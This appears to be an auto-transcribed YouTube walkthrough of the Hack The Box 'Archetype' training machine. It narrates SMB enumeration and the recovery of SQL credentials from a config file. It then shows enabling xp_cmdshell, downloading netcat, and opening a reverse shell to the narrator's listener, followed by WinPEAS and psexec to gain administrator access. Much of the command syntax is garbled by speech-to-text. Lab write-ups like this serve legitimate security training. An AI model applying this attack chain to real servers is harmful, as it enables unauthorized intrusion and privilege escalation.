What's going on YouTube? Nova here. Today we're going to go ahead and take a look at Hack the Box's starting point tier 2 Archetype machine. I've already owned this one, ended up having some video recording issues, so I'm just going to go ahead and run you guys through it, show you the process I did. If you guys have anything you did differently, just go ahead and let me know. I like to learn a lot of new things. So without further ado, let's go ahead and start our nmap scan. Let's see. And I'm going to go ahead and pause this video and get back to you guys when the scan is done. Alright guys, as you can see, the scan is done. So let's see what we got up here. So we have 4 ports open. You got the net BIOS, which is on port 139, SMB 445 and 1433. Looks like it's running Microsoft SQL Server. So our first question is, which TCP port is hosting a database server? Based on that, you got 1433, which is running Microsoft SQL Server 2017. So your answer is going to be 1433. What is the name of the non-administrative share available over SMB? So we see that 1433 is running the SQL Server. So let's go ahead and SMB into that using the SMB client. So we don't know any passwords yet, so we're going to use the tac in. And then we're just going to go ahead and use tac-l to list everything, and then the IP address. And you can see here we got admin, backup, C, and IPC. And 3 of those are for admin. You can tell by the $sign here. The only one it looks like we do have access to is backups. What is the name of the non-administrator share? So our answer would be backups here. What is the password identified in the file on the SMB share? So to figure that out, we're going to have to SMB client into that share. Remember, we don't have the password, so we're going to use the tac in. Alright, so now you can see we have SMB here, which means we are in. So let's just go ahead and dir to see what files we have. Alright, so we got prod.dtsconfig, and if you remember from the last machine, we ended up using git to get files from a SMB share. Alright, so it downloaded. Now we can go ahead and exit out. We'll just do an ls, and you can see the file right there. So now we're just going to cat it so we can read it. And let's see what we got here. Alright, configured value data source. Okay, so we got a password of megacorp123, user ID archetype SQL _ SVC. Okay, so that'll come in handy, so go ahead and write those down. What is the password identified in the file share? So that's right here, password equals megacorp123. What script from in-packet collection can be used in order to establish an authenticated connection for a Microsoft SQL Server? So if you haven't already, you're going to want to install the in-packet, which I'll put the commands here. That's just going to clone it, and then you're going to want to change your directory to the in-packet, which for me would just be packet. And then if you do not have pip installed, just go ahead and do this, and then pip3 install tac-r. Alright, so I'm going to go ahead and leave that up for a second. You can pause the video if you need to, but that'll install the in-packet onto your machine so we can use those files. Close without saving. Alright, so I already did that. As you can see, I got a file or a folder directory called in-packet. And we're going to go ahead and take a look at the examples. And now we're looking for, in order to establish an authenticated, so Microsoft SQL Server. So we'll go to the M's, okay, so right here we got Microsoft SQL Client and Instance. So the answer is going to be Microsoft Client.py. Okay. Extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell. So now we're just going to have to access it. So we're going to do Python 3 because these are Python scripts. SQL client.py. And then Archetype. We're using the username we found, SQL_service at our IP address of and then we're going to do Windows authentication and see if we can get in that way. Alright, so it's asking for the password, which we found earlier, which was the megacorp123. So it's capital M3G4C0RP123. Alright, look at that. We are in. So you could go ahead and type help. So a couple things that jump out right now is XP command shell, which executes commands using XP command shell. So that's going to be the answer for this one is XP command shell, as you can see right here. What script can be used in order to search possible paths to escalate privileges on Windows hosts? So before we go ahead and do that, we'll just see what we can do with this XP command shell. So we'll see if it's enabled or not. Alright, error. Blocked access procedure. Because components. So the component is turned off. So we don't have access to the XP command shell yet because it is turned off. A system manager can enable the use of X. So admins can enable the XP command shell by using spconfigure. That's good to know. So let's go ahead and try executing spconfigure. And then we'll go show advanced options. Configuration, show advanced options, change from 0 to 1. So 0 is false, 1 is true, off, on. And then we'll go ahead and reconfigure that now. So there's two columns that this uses. You got your run value and then your change value. So the run value before we reconfigured was 0 and our change value was 1, and when we hit reconfigure it would change the run value to 1. So that's why we're reconfiguring to update these settings. Now we're gonna check spconfig figure, and right now we have XP command shell of 0. So let's go ahead and execute spconfigure XP command shell. So change from 0 to 1. So now we gotta go ahead and reconfigure again. And then we could just check everything. And XP command shell is now 1. So now we should be able to command shell who am I? And it tells us we are SQL service. So now we're gonna do Netcat and WinPeas. So WinPeas is actually a pretty cool script, which we'll end up using here in a few. As you can see, our answer is WinPeas. But first we're gonna wanna download Netcat if you haven't already and see. You can use the 64-bit version as well, NC64, but NC just worked perfectly for me. So just go ahead and click download. Once you have that, you're gonna navigate to your downloads folder. And as you can see, I've already downloaded NC and I've already downloaded WinPeas. So now let's go ahead and start up a server using sudo python3 tac and http.server. We'll do 8080. Go ahead and enter our password. So now we have a server started inside the downloads folder. So we could come over here and use an command shell, Powershell. Alright, so now that we have that downloaded, let's go ahead and do command shell Powershell wget, if you remember that command. And then let's do our IP address, which if you come over here, we can do ifconfig, which I already have done up here. And we're looking for tune 0. And this is going to give us our IP address, 10.10.15.250. So now you're going to do 10.10.15.250. Yeah. And then our server is on port 80. And then we're going to do out file temp /nc.exe and see what that gets us. Alright, so we got the output null, so that's a good sign. We can come over here, the server that we're running in our downloads folder right now says we actually got the NC file. Now that we have that downloaded, let's go ahead and start up our listener. So we can go Control C to stop that. And then we'll go ahead and run our listener using sudo netcat lb np. You can choose any port you want. I like to do 444. And right now it's listening on port 444. So now we can come here and we're going to execute that file we just downloaded. %temp %/nc.exe. And then it's going to be our IP address, which was 10.10.15.250. And that was, we said it was on port 444 or 4444. E to execute command.exe. Alright, so right here it looks like it's stalled, so let's go over here to our listener. And we have success. Now we are on C:\Windows System 32. That's always good. So what file contains administrator password? We don't know that yet. So on a lot of the hack the box machines, they like to store the flags of the users onto the desktop. So we'll just go ahead and navigate to the SQL service desktop, which is the user we currently are. So to do that, we'll just go back a couple. Click dir. So we see users. Directory that again. CD SQL service. Directory that again. And we see desktop. So CD desktop. Directory that. Alright, so we see a user.txt. Now since we are on a Windows machine, we do not have access to cat, but Windows has something similar called type. And we have the user flag. So we'll copy that. And we'll store that. So user flag. Alright. So now we have that. Let's go ahead and execute PowerShell now. So we'll go ahead and PowerShell. Alright, so all I did was just wanted to execute the PowerShell. So now you can see here we got PS for PowerShell. Let's go back into, we're going to turn this into a CD downloads, because we're going to download WinPeas. Now if you haven't already, that should be this one here, Carlos Polop Peas. and you're going to look for WinP64 and download that. Once you've downloaded that, go ahead and start up a server again using sudo python3 tac-m http.server, and then we could just do port 80, that's fine. Username, password. Alright, so now that we got PowerShell, we're going to go ahead and wget http our IP address, and then keys x64.exe. I'm going to outfile that to keys x64.exe. Alright, wget WinPeas to outfile. Come over here, and you can see that. That's good. So now that we have that, we can go ahead and execute that. So how we're going to execute that is just executing it with a ./WinPeas x64.exe. And I will get back to you guys when this is finished. Alright guys, so this just finished up, and it looks like we have some interesting information here. SQL service, roaming, Microsoft Windows, PowerShell. So it has a console host history. So if we go over here, what file contains the administrator password, console host. Alright, so let's go ahead and navigate to this console host history here. And see what shows up on there. So we could do cd, make this a little bit bigger so we can see it. c:users. And we see our console host history. So if you remember earlier, we could type console host history.txt. Alright, so by viewing that file, we were able to see the username is administrator and the password is megacorp. Alright, so let's go ahead and add this one. What file contains the administrator password? Console host history, which is the file we just found. We already have the username, or the flag for the user, SQL service, so go ahead and add that in. So now we just got to get the root flag. So remember, we're still logged on as SQL service, so we can go ahead and exit this now since we don't need it. So Control C, exit, clear. I'm just clearing it up so it makes it easy. And then we'll go ahead and ls examples. And to log in as administrator, we can use this PowerShell execution Python script by doing python3 ps-execute.py. And we know the administrator now. So we'll just do administrator at, and then our IP address of 10.129.161. I ended up having to reset my machine, but no harm there. Let's go ahead and try logging on with this. And it is now asking us for our password, which we found in the console host history text file, which was megacorp _4dm1n. Boom. Alright, so we have access as the administrator. So just like we did with the user flag, we can navigate to the desktop of the administrator. We'll go ahead and do that now. I believe it's administrator, yeah. And then we'll go straight to the desktop. And we have a root.txt. So we'll go ahead and type that out, root.txt. And there's our root. Alright, so submit the root flag, which we have here. Go ahead and show the answer there. Alright guys, so this one was classified as easy, but it was a little difficult. I had to Google some stuff because I'm not too big on privilege escalation as of yet. That's why I'm making these videos, so I can get better at doing all of this. If you have any questions, comments, or tips, feel free to hit me up and let me know.